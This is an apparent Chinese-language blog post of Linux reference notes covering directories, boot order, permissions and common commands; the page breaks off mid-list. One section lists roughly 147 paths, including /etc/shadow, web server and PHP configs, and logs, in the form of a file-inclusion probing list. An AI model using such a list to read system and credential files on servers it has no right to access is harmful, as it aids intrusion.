<!doctype html>



  


<html class="theme-next mist use-motion" lang="zh-Hans">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>



<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />




  
  
  
  

  
    
    
  

  
    
      
    

    
  

  

  

  
    
      
    

    
  

  
    
    
    <link href="//fonts.googleapis.com/css?family=Lato:300,300italic,400,400italic,700,700italic|Roboto Slab:300,300italic,400,400italic,700,700italic|PT Mono:300,300italic,400,400italic,700,700italic&subset=latin,latin-ext" rel="stylesheet" type="text/css">
  






<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.0" rel="stylesheet" type="text/css" />


  <meta name="keywords" content="linux," />








  <link rel="shortcut icon" type="image/x-icon" href="/favicon.ico?v=5.1.0" />






<meta name="description" content="概述记录一下Linux的常用命令，方便查询。
持续更新中。">
<meta property="og:type" content="article">
<meta property="og:title" content="Linux 基础知识">
<meta property="og:url" content="http://orleven.orleven.com/2016/12/22/linux-base/index.html">
<meta property="og:site_name" content="Orleven Blog">
<meta property="og:description" content="概述记录一下Linux的常用命令，方便查询。
持续更新中。">
<meta property="og:updated_time" content="2017-04-04T02:07:06.134Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="Linux 基础知识">
<meta name="twitter:description" content="概述记录一下Linux的常用命令，方便查询。
持续更新中。">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Mist',
    sidebar: {"position":"left","display":"post","offset":12,"offset_float":0,"b2t":false,"scrollpercent":false},
    fancybox: true,
    motion: true,
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://orleven.orleven.com/2016/12/22/linux-base/"/>





  <title> Linux 基础知识 | Orleven Blog </title>
</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  














  
  
    
  

  <div class="container one-collumn sidebar-position-left page-post-detail ">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Orleven Blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle">Orleven Blog</p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br />
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br />
            
            关于
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            归档
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            标签
          </a>
        </li>
      

      
        <li class="menu-item menu-item-search">
          
            <a href="javascript:;" class="popup-trigger">
          
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br />
            
            搜索
          </a>
        </li>
      
    </ul>
  

  
    <div class="site-search">
      
  <div class="popup search-popup local-search-popup">
  <div class="local-search-header clearfix">
    <span class="search-icon">
      <i class="fa fa-search"></i>
    </span>
    <span class="popup-btn-close">
      <i class="fa fa-times-circle"></i>
    </span>
    <div class="local-search-input-wrapper">
      <input autocapitalize="off" autocomplete="off" autocorrect="off"
             placeholder="搜索..." spellcheck="false"
             type="text" id="local-search-input">
    </div>
  </div>
  <div id="local-search-result"></div>
</div>



    </div>
  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal " itemscope itemtype="http://schema.org/Article">
    <link itemprop="mainEntityOfPage" href="http://orleven.orleven.com/2016/12/22/linux-base/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Orleven">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/orleven.jpg">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Orleven Blog">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">
            
            
              
                Linux 基础知识
              
            
          </h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2016-12-22T00:22:12+08:00">
                2016-12-21
              </time>
            

            

            
          </span>

          
            <span class="post-category" >
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/linux/" itemprop="url" rel="index">
                    <span itemprop="name">linux</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          
          

          

          

          

        </div>
      </header>
    


    <div class="post-body" itemprop="articleBody">

      
      

      
        <h1 id="概述"><a href="#概述" class="headerlink" title="概述"></a>概述</h1><p>记录一下Linux的常用命令，方便查询。</p>
<p>持续更新中。</p>
<a id="more"></a>
<h1 id="目录"><a href="#目录" class="headerlink" title="目录"></a>目录</h1><h2 id="基本目录"><a href="#基本目录" class="headerlink" title="基本目录"></a>基本目录</h2><figure class="highlight c"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div></pre></td><td class="code"><pre><div class="line">/var (variable)：与系统运作过程有关。</div><div class="line">/var/<span class="built_in">log</span>/   日志</div><div class="line">/dev    驱动</div><div class="line">    比要重要的档案有/dev/null, /dev/zero, /dev/tty, /dev/lp*, /dev/hd*, /dev/sd*等等</div><div class="line">/usr (软件放置处)</div><div class="line">/usr/local      系统管理员在本机自行安装自己下载的软件</div><div class="line">/usr/share/doc  说明文件档</div><div class="line">/opt (第三方协力软件)</div><div class="line">/etc (配置文件) </div><div class="line">/etc/init.d/：所有朋务的预设启动 script 都是放在这里的。</div><div class="line">    例如要启动或者关闭 iptables 的话：『 /etc/init.d/iptables start』、『/etc/init.d/iptables stop』</div><div class="line">/boot (开机与核心档)</div><div class="line">    Linux kernel常用的档名为：vmlinuz，如果使用的是grub这个开机管理程序， 则还会存在/boot/grub/这个目录喔！</div><div class="line">/bin    系统有很多放置执行文件的目录，但/bin比较特殊。</div><div class="line">    因为/bin放置的是在单人维护模式下还能够被操作的指令。在/bin底下的指令可以被root不一般账号所使用，主要有：cat, chmod, chown, date, mv, mkdir, cp, bash等等常用的指令。</div><div class="line">/home   这是系统默认的用户家目录(home directory)。</div><div class="line">/lib    系统的函式库</div><div class="line">/media  可移除的装置啦！ 包括软盘、光盘、DVD等等装置都暂时挂载在这。</div><div class="line">/mnt    如果你想要暂时挂载某些额外的装置，一般建议你可以放置到这个目录中。</div><div class="line">/srv    是一些网络朋务启动后，这些服务所需要取用的数据目录。</div><div class="line">/tmp    暂时放置档案的地方。</div><div class="line">/lost+found </div><div class="line">    这个目录是使用标准的ext2/ext3文件系统格式才会产生的一个目录，目的在二当文件系统发生错误时， 将一些遗失的片段放置到这个目录下。这个目录通常会在分割槽的最顶层存在， 例如你加装一颗硬盘于/disk中，那在这个系统下就会自动产生一个这样的目录『/disk/lost+found』</div><div class="line">/proc</div><div class="line">    他放置的数据都是在内存当中， 例如系统核心、行程信息(process)、周边装置的状态及网络状态等等。因为这个目录下的数据都是在内存当中， 所以本身不占任何硬盘空间啊！比较重要的档案例如：/proc/cpuinfo, /proc/dma, /proc/interrupts, /proc/ioports, /  proc/net<span class="comment">/* 等等。</span></div><div class="line">/sys</div><div class="line">    这个目录其实跟/proc非常类似，也是一个虚拟的文件系统，主要也是记录不核心相关的信息。 包括目前已加载的核心模块不核心侦测到的硬件装置信息等等。这个目录同样不占硬盘容量喔！</div><div class="line">/sbin   重要的系统执行文件</div></pre></td></tr></table></figure>
<h2 id="常见路径"><a href="#常见路径" class="headerlink" title="常见路径"></a>常见路径</h2><p>Linux 系统下的一些常见路径：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div><div class="line">29</div><div class="line">30</div><div class="line">31</div><div class="line">32</div><div class="line">33</div><div class="line">34</div><div class="line">35</div><div class="line">36</div><div class="line">37</div><div class="line">38</div><div class="line">39</div><div class="line">40</div><div class="line">41</div><div class="line">42</div><div class="line">43</div><div class="line">44</div><div class="line">45</div><div class="line">46</div><div class="line">47</div><div class="line">48</div><div class="line">49</div><div class="line">50</div><div class="line">51</div><div class="line">52</div><div class="line">53</div><div class="line">54</div><div class="line">55</div><div class="line">56</div><div class="line">57</div><div class="line">58</div><div class="line">59</div><div class="line">60</div><div class="line">61</div><div class="line">62</div><div class="line">63</div><div class="line">64</div><div class="line">65</div><div class="line">66</div><div class="line">67</div><div class="line">68</div><div class="line">69</div><div class="line">70</div><div class="line">71</div><div class="line">72</div><div class="line">73</div><div class="line">74</div><div class="line">75</div><div class="line">76</div><div class="line">77</div><div class="line">78</div><div class="line">79</div><div class="line">80</div><div class="line">81</div><div class="line">82</div><div class="line">83</div><div class="line">84</div><div class="line">85</div><div class="line">86</div><div class="line">87</div><div class="line">88</div><div class="line">89</div><div class="line">90</div><div class="line">91</div><div class="line">92</div><div class="line">93</div><div class="line">94</div><div class="line">95</div><div class="line">96</div><div class="line">97</div><div class="line">98</div><div class="line">99</div><div class="line">100</div><div class="line">101</div><div class="line">102</div><div class="line">103</div><div class="line">104</div><div class="line">105</div><div class="line">106</div><div class="line">107</div><div class="line">108</div><div class="line">109</div><div class="line">110</div><div class="line">111</div><div class="line">112</div><div class="line">113</div><div class="line">114</div><div class="line">115</div><div class="line">116</div><div class="line">117</div><div class="line">118</div><div class="line">119</div><div class="line">120</div><div class="line">121</div><div class="line">122</div><div class="line">123</div><div class="line">124</div><div class="line">125</div><div class="line">126</div><div class="line">127</div><div class="line">128</div><div class="line">129</div><div class="line">130</div><div class="line">131</div><div class="line">132</div><div class="line">133</div><div class="line">134</div><div class="line">135</div><div class="line">136</div><div class="line">137</div><div class="line">138</div><div class="line">139</div><div class="line">140</div><div class="line">141</div><div class="line">142</div><div class="line">143</div><div class="line">144</div><div class="line">145</div><div class="line">146</div><div class="line">147</div></pre></td><td class="code"><pre><div class="line">/etc/passwd</div><div class="line">/etc/shadow</div><div class="line">/etc/fstab</div><div class="line">/etc/host.conf</div><div class="line">/etc/motd</div><div class="line">/etc/ld.so.conf</div><div class="line">/var/www/htdocs/index.php</div><div class="line">/var/www/conf/httpd.conf</div><div class="line">/var/www/htdocs/index.html</div><div class="line">/var/httpd/conf/php.ini</div><div class="line">/var/httpd/htdocs/index.php</div><div class="line">/var/httpd/conf/httpd.conf</div><div class="line">/var/httpd/htdocs/index.html</div><div class="line">/var/httpd/conf/php.ini</div><div class="line">/var/www/index.html</div><div class="line">/var/www/index.php</div><div class="line">/opt/www/conf/httpd.conf</div><div class="line">/opt/www/htdocs/index.php</div><div class="line">/opt/www/htdocs/index.html</div><div class="line">/usr/local/apache/htdocs/index.html</div><div class="line">/usr/local/apache/htdocs/index.php</div><div class="line">/usr/local/apache2/htdocs/index.html</div><div class="line">/usr/local/apache2/htdocs/index.php</div><div class="line">/usr/local/httpd2.2/htdocs/index.php</div><div class="line">/usr/local/httpd2.2/htdocs/index.html</div><div class="line">/tmp/apache/htdocs/index.html</div><div class="line">/tmp/apache/htdocs/index.php</div><div class="line">/etc/httpd/htdocs/index.php</div><div class="line">/etc/httpd/conf/httpd.conf</div><div class="line">/etc/httpd/htdocs/index.html</div><div class="line">/www/php/php.ini</div><div class="line">/www/php4/php.ini</div><div class="line">/www/php5/php.ini</div><div class="line">/www/conf/httpd.conf</div><div class="line">/www/htdocs/index.php</div><div class="line">/www/htdocs/index.html</div><div class="line">/usr/local/httpd/conf/httpd.conf</div><div class="line">/apache/apache/conf/httpd.conf</div><div class="line">/apache/apache2/conf/httpd.conf</div><div class="line">/etc/apache/apache.conf</div><div class="line">/etc/apache2/apache.conf</div><div class="line">/etc/apache/httpd.conf</div><div class="line">/etc/apache2/httpd.conf</div><div class="line">/etc/apache2/vhosts.d/00_default_vhost.conf</div><div class="line">/etc/apache2/sites-available/default</div><div class="line">/etc/phpmyadmin/config.inc.php</div><div class="line">/etc/mysql/my.cnf</div><div class="line">/etc/httpd/conf.d/php.conf</div><div class="line">/etc/httpd/conf.d/httpd.conf</div><div class="line">/etc/httpd/logs/error_log</div><div class="line">/etc/httpd/logs/error.log</div><div class="line">/etc/httpd/logs/access_log</div><div class="line">/etc/httpd/logs/access.log</div><div class="line">/home/apache/conf/httpd.conf</div><div class="line">/home/apache2/conf/httpd.conf</div><div class="line">/var/log/apache/error_log</div><div class="line">/var/log/apache/error.log</div><div class="line">/var/log/apache/access_log</div><div class="line">/var/log/apache/access.log</div><div class="line">/var/log/apache2/error_log</div><div class="line">/var/log/apache2/error.log</div><div class="line">/var/log/apache2/access_log</div><div class="line">/var/log/apache2/access.log</div><div class="line">/var/www/logs/error_log</div><div class="line">/var/www/logs/error.log</div><div class="line">/var/www/logs/access_log</div><div class="line">/var/www/logs/access.log</div><div class="line">/usr/local/apache/logs/error_log</div><div class="line">/usr/local/apache/logs/error.log</div><div class="line">/usr/local/apache/logs/access_log</div><div class="line">/usr/local/apache/logs/access.log</div><div class="line">/var/log/error_log</div><div class="line">/var/log/error.log</div><div class="line">/var/log/access_log</div><div class="line">/var/log/access.log</div><div class="line">/usr/local/apache/logs/access_logaccess_log.old</div><div class="line">/usr/local/apache/logs/error_logerror_log.old</div><div class="line">/etc/php.ini</div><div class="line">/bin/php.ini</div><div class="line">/etc/init.d/httpd</div><div class="line">/etc/init.d/mysql</div><div class="line">/etc/httpd/php.ini</div><div class="line">/usr/lib/php.ini</div><div class="line">/usr/lib/php/php.ini</div><div class="line">/usr/local/etc/php.ini</div><div class="line">/usr/local/lib/php.ini</div><div class="line">/usr/local/php/lib/php.ini</div><div class="line">/usr/local/php4/lib/php.ini</div><div class="line">/usr/local/php4/php.ini</div><div class="line">/usr/local/php4/lib/php.ini</div><div class="line">/usr/local/php5/lib/php.ini</div><div class="line">/usr/local/php5/etc/php.ini</div><div class="line">/usr/local/php5/php5.ini</div><div class="line">/usr/local/apache/conf/php.ini</div><div class="line">/usr/local/apache/conf/httpd.conf</div><div class="line">/usr/local/apache2/conf/httpd.conf</div><div class="line">/usr/local/apache2/conf/php.ini</div><div class="line">/etc/php4.4/fcgi/php.ini</div><div class="line">/etc/php4/apache/php.ini</div><div class="line">/etc/php4/apache2/php.ini</div><div class="line">/etc/php5/apache/php.ini</div><div class="line">/etc/php5/apache2/php.ini</div><div class="line">/etc/php/php.ini</div><div class="line">/etc/php/php4/php.ini</div><div class="line">/etc/php/apache/php.ini</div><div class="line">/etc/php/apache2/php.ini</div><div class="line">/web/conf/php.ini</div><div class="line">/usr/local/Zend/etc/php.ini</div><div class="line">/opt/xampp/etc/php.ini</div><div class="line">/var/local/www/conf/php.ini</div><div class="line">/var/local/www/conf/httpd.conf</div><div class="line">/etc/php/cgi/php.ini</div><div class="line">/etc/php4/cgi/php.ini</div><div class="line">/etc/php5/cgi/php.ini</div><div class="line">/php5/php.ini</div><div class="line">/php4/php.ini</div><div class="line">/php/php.ini</div><div class="line">/PHP/php.ini</div><div class="line">/apache/php/php.ini</div><div class="line">/xampp/apache/bin/php.ini</div><div class="line">/xampp/apache/conf/httpd.conf</div><div class="line">/NetServer/bin/stable/apache/php.ini</div><div class="line">/home2/bin/stable/apache/php.ini</div><div class="line">/home/bin/stable/apache/php.ini</div><div class="line">/var/log/mysql/mysql-bin.log</div><div class="line">/var/log/mysql.log</div><div class="line">/var/log/mysqlderror.log</div><div class="line">/var/log/mysql/mysql.log</div><div class="line">/var/log/mysql/mysql-slow.log</div><div class="line">/var/mysql.log</div><div class="line">/var/lib/mysql/my.cnf</div><div class="line">/usr/local/mysql/my.cnf</div><div class="line">/usr/local/mysql/bin/mysql</div><div class="line">/etc/mysql/my.cnf</div><div class="line">/etc/my.cnf</div><div class="line">/usr/local/cpanel/logs</div><div class="line">/usr/local/cpanel/logs/stats_log</div><div class="line">/usr/local/cpanel/logs/access_log</div><div class="line">/usr/local/cpanel/logs/error_log</div><div class="line">/usr/local/cpanel/logs/license_log</div><div class="line">/usr/local/cpanel/logs/login_log</div><div class="line">/usr/local/cpanel/logs/stats_log</div><div class="line">/usr/local/share/examples/php4/php.ini</div><div class="line">/usr/local/share/examples/php/php.ini</div><div class="line">/usr/local/tomcat5527/bin/version.sh</div><div class="line">/usr/share/tomcat6/bin/startup.sh</div><div class="line">/usr/tomcat6/bin/startup.sh</div></pre></td></tr></table></figure>
<h1 id="开机流程"><a href="#开机流程" class="headerlink" title="开机流程"></a>开机流程</h1><p>简单的说，整个开机流程到操作系统之前的动作应该是这样的：</p>
<ol>
<li>BIOS：开机主动执行的韧体，会认识第一个可开机的装置；</li>
<li>MBR：第一个可开机装置的第一个扇区内的主要启动记录区块，内吨开机管理程序；</li>
<li>开机管理程序(boot loader)：一支可读叏核心档案来执行的软件；</li>
<li>核心档案：开始操作系统的功能…</li>
</ol>
<h1 id="文件属性"><a href="#文件属性" class="headerlink" title="文件属性"></a>文件属性</h1><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div></pre></td><td class="code"><pre><div class="line">drwxr-xr-x   16    root     root   4096     Aug  6 22:01 ImageMagick</div><div class="line">[ 权限 ]   [连结] [拥有者] [群组][档案容量] [ 修改日期 ]  [ 文件名 ]</div><div class="line"></div><div class="line"></div><div class="line">   d               rwx           r-x             r-x</div><div class="line">[ 文件类型 ] [ 文件拥有者 ] [ 文件所属组 ] [ 其他人权限 ]</div><div class="line">第一个字符代表这个档案是『目录、档案或链接文件等等』：</div><div class="line">* 当为[ d ]则是目录，例如上表档名为『.gconf』的那一行；</div><div class="line">* 当为[ - ]则是档案，例如上表档名为『install.log』那一行；</div><div class="line">* 若是[ l ]则表示为连结档(link file)；</div><div class="line">* 若是[ b ]则表示为装置文件里面的可供储存的接口讴备(可随机存取装置)；</div><div class="line">* 若是[ c ]则表示为装置文件里面的串行端口讴备，例如键盘、鼠标(一次性读取装置)。</div></pre></td></tr></table></figure>
<h2 id="权限对目录的重要性"><a href="#权限对目录的重要性" class="headerlink" title="权限对目录的重要性"></a>权限对目录的重要性</h2><h3 id="可读"><a href="#可读" class="headerlink" title="可读"></a>可读</h3><p>表示具有读取目录结构列表的权限，所以当你具有读取(r)一个目录的权限时，表示你可以查询该目录下的文件名数据。 所以你就可以利用 ls 这个指令将该目录的内容列表显示出来！</p>
<h3 id="可写"><a href="#可写" class="headerlink" title="可写"></a>可写</h3><p>这个可写入的权限对目录来说，是很里不起起的！ 因为他表示你具有移动该目录结构列表的权限，也就是底下这些权限：</p>
<ol>
<li>建立新的档案与目录；</li>
<li>删除已经存在的档案与目录(不论该档案的权限为何！)</li>
<li>将已存在的档案或目录进行更名；</li>
<li>搬移该目录内的档案、目录位置。<br>总之，目录的w权限就与该目录底下的文件名异动有关就对了啦！</li>
</ol>
<h3 id="执行"><a href="#执行" class="headerlink" title="执行"></a>执行</h3><p>目录只是记录文件名而已，总不能拿来执行吧？<br>没错！目录不可以被执行，目录的x代表的是用户能否迚入该目录成为工作目录的用途！<br>所谓的工作目录(work directory)就是你目前所在的目录啦！举例来说，当你登入Linux时， 你所在的家目录就<br>是你当下的工作目录。而变换目录的命令是『cd』(change directory)啰！</p>
<p>工作目录对于指令的执行是非常重要的，如果你在某目录下不具有x的权限， 那么你就无法切换到该目录下，也就无法执行该目录下的任何指令，即使你具有该目录的r的权限。</p>
<h2 id="文件名限制"><a href="#文件名限制" class="headerlink" title="文件名限制"></a>文件名限制</h2><p>在Linux底下，使用预设的Ext2/Ext3文件系统时，针对档案的档名长度限制为：</p>
<ul>
<li>单一档案或目录的最大容许文件名为 255 个字符；</li>
<li>包函完整路径名称及目录 (/) 的完整档名为 4096 个字符。<br>以及避免一些特殊字符比较好！例如底下这些：<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">* ? &gt; &lt; ; &amp; ! [ ] | \ &apos; &quot; ` ( ) &#123; &#125;</div></pre></td></tr></table></figure>
</li>
</ul>
<h1 id="常用指令"><a href="#常用指令" class="headerlink" title="常用指令"></a>常用指令</h1><h2 id="基础指令"><a href="#基础指令" class="headerlink" title="基础指令"></a>基础指令</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div><div class="line">29</div><div class="line">30</div><div class="line">31</div><div class="line">32</div><div class="line">33</div><div class="line">34</div><div class="line">35</div><div class="line">36</div><div class="line">37</div><div class="line">38</div><div class="line">39</div><div class="line">40</div><div class="line">41</div><div class="line">42</div><div class="line">43</div><div class="line">44</div><div class="line">45</div><div class="line">46</div><div class="line">47</div><div class="line">48</div><div class="line">49</div><div class="line">50</div><div class="line">51</div><div class="line">52</div><div class="line">53</div><div class="line">54</div><div class="line">55</div><div class="line">56</div><div class="line">57</div><div class="line">58</div><div class="line">59</div><div class="line">60</div></pre></td><td class="code"><pre><div class="line"></div><div class="line">date 显示日期</div><div class="line">cal  显示日历</div><div class="line">bc   计算器</div><div class="line">[Ctrl]-c  中断目前程序</div><div class="line">[Ctrl]-d  取代exit的输入</div><div class="line">info  指令说明</div><div class="line">man  指令说明</div><div class="line">whatis  指令说明</div><div class="line">shutdown    关机</div><div class="line">reboot  重启</div><div class="line">halt    重启</div><div class="line">poweroff    重启</div><div class="line">init 系统运作的模式</div><div class="line">    init 0 关机</div><div class="line">chgrp   改变档案所属群组</div><div class="line">chown   改变档案拥有者</div><div class="line">chmod   改变档案的权限, SUID, SGID, SBIT等等的特权</div><div class="line">cd      变换目录</div><div class="line">pwd     显示弼前目录</div><div class="line">mkdir       建立一个新的目录</div><div class="line">rmdir       删除一个空的目录</div><div class="line">cp      (复制档案或目录)</div><div class="line">rm      (移除档案或目录)</div><div class="line">mv      (移动档案与目录，或更名)</div><div class="line">cat 由第一行开始显示档案内容</div><div class="line">tac 从最后一行开始显示，可以看出 tac 是 cat 的倒着写！</div><div class="line">nl 显示的时候，顺道输出行号！</div><div class="line">more 一页一页的显示档案内容</div><div class="line">less 不 more 类似，但是比 more 更好的是，他可以往前翻页！</div><div class="line">head 叧看头几行</div><div class="line">tail 叧看尾巳几行</div><div class="line">od 以二迚制的方式读取档案内容！</div><div class="line">touch       修改档案时间或建置新档</div><div class="line">umask       档案预设权限</div><div class="line">chattr      (配置文件案隐藏属性) </div><div class="line">lsattr      (显示档案隐藏属性) </div><div class="line">file        观察文件类型</div><div class="line">which       (寻找『执行档』)</div><div class="line">whereis     (寻找特定档案)</div><div class="line">locate      </div><div class="line">    这是因为 locate 寻找的数据是由『已建立的数据库 /var/lib/mlocate/』 里面大的数据所搜寻到的，所以不用直接在去硬盘弼中存取数据</div><div class="line">find    不过由亍 find 在寻找数据得时后相当的操硬盘</div><div class="line">tar</div><div class="line">    压 缩：tar -jcv -f filename.tar.bz2 要被压缩的档案或目录名称</div><div class="line">  查 询：tar -jtv -f filename.tar.bz2</div><div class="line">  解压缩：tar -jxv -f filename.tar.bz2 -C 欲解压缩的目录</div><div class="line">type    Bash shell 的内建命令</div><div class="line">grep    搜索指定字符串</div><div class="line">kill    杀死进程        </div><div class="line">ps      将某个时间点的程序运作情况撷取下来</div><div class="line">top     动态观察程序的变化</div><div class="line">pstree  查到程序相关性</div><div class="line">free    观察内存使用情况</div><div class="line">uname   查阅系统与核心相关信息</div><div class="line">uptime  观察系统启动时间与工作负载</div><div class="line">netstat     追踪网络或插槽文件</div><div class="line">vmstat  侦测系统资源变化</div><div class="line">lsof        列出被程序所开启的档案文件名</div><div class="line">pidof ：找出某支正在执行的程序的 PID</div></pre></td></tr></table></figure>
<h2 id="常用指令-1"><a href="#常用指令-1" class="headerlink" title="常用指令"></a>常用指令</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div><div class="line">29</div><div class="line">30</div><div class="line">31</div><div class="line">32</div><div class="line">33</div><div class="line">34</div><div class="line">35</div><div class="line">36</div><div class="line">37</div><div class="line">38</div><div class="line">39</div><div class="line">40</div><div class="line">41</div><div class="line">42</div><div class="line">43</div><div class="line">44</div><div class="line">45</div><div class="line">46</div><div class="line">47</div><div class="line">48</div><div class="line">49</div><div class="line">50</div><div class="line">51</div><div class="line">52</div><div class="line">53</div><div class="line">54</div><div class="line">55</div><div class="line">56</div><div class="line">57</div><div class="line">58</div><div class="line">59</div><div class="line">60</div><div class="line">61</div><div class="line">62</div><div class="line">63</div><div class="line">64</div><div class="line">65</div><div class="line">66</div><div class="line">67</div><div class="line">68</div><div class="line">69</div><div class="line">70</div><div class="line">71</div><div class="line">72</div><div class="line">73</div><div class="line">74</div><div class="line">75</div><div class="line">76</div><div class="line">77</div><div class="line">78</div><div class="line">79</div><div class="line">80</div><div class="line">81</div><div class="line">82</div><div class="line">83</div><div class="line">84</div><div class="line">85</div><div class="line">86</div><div class="line">87</div><div class="line">88</div><div class="line">89</div><div class="line">90</div><div class="line">91</div><div class="line">92</div><div class="line">93</div><div class="line">94</div><div class="line">95</div><div class="line">96</div><div class="line">97</div><div class="line">98</div><div class="line">99</div><div class="line">100</div><div class="line">101</div><div class="line">102</div><div class="line">103</div><div class="line">104</div><div class="line">105</div><div class="line">106</div><div class="line">107</div><div class="line">108</div><div class="line">109</div><div class="line">110</div><div class="line">111</div><div class="line">112</div><div class="line">113</div><div class="line">114</div><div class="line">115</div><div class="line">116</div><div class="line">117</div><div class="line">118</div><div class="line">119</div><div class="line">120</div><div class="line">121</div><div class="line">122</div><div class="line">123</div><div class="line">124</div><div class="line">125</div><div class="line">126</div><div class="line">127</div><div class="line">128</div><div class="line">129</div><div class="line">130</div><div class="line">131</div><div class="line">132</div><div class="line">133</div><div class="line">134</div><div class="line">135</div><div class="line">136</div><div class="line">137</div><div class="line">138</div><div class="line">139</div><div class="line">140</div><div class="line">141</div><div class="line">142</div><div class="line">143</div><div class="line">144</div><div class="line">145</div><div class="line">146</div><div class="line">147</div><div class="line">148</div><div class="line">149</div><div class="line">150</div><div class="line">151</div><div class="line">152</div><div class="line">153</div><div class="line">154</div><div class="line">155</div><div class="line">156</div><div class="line">157</div><div class="line">158</div><div class="line">159</div><div class="line">160</div><div class="line">161</div><div 